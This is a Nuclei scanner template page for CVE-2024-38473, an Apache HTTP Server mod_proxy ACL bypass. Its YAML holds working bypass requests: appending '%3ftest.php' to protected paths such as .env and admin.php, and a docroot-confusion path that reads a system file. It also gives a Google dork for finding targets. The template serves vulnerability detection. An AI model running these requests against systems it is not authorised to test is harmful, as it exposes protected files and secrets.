Skip to content
Nuclei Templates

Apache HTTP Server - ACL Bypass

ID: CVE-2024-38473

Severity: high

Author: pdteam

Tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm

Description

Section titled “Description”

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.

YAML Source

Section titled “YAML Source”
id: CVE-2024-38473


info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  remediation: |
    Fixed in v2.4.60
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.00043
    epss-percentile: 0.09569
    cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
  metadata:
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm


flow: |
  http(1) && http(2)
  http(3)


http:
  # Path normalization ACL bypass
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"


    payloads:
      files:
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - admin.php
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - adminer.php
        - xmlrpc.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php


    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true


  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"


    matchers:
      - type: status
        status:
          - 200


  # docroot confusion
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"


    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# digest: 490a0046304402203bd37f951f214fd6150ec5550180baa99fba1970360245ada39486136ae5f64f02205f1453c14c750361c649a92815125e20a484fdf929e6c49408f30fd0fd36ee9f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-38473.yaml"

View on Github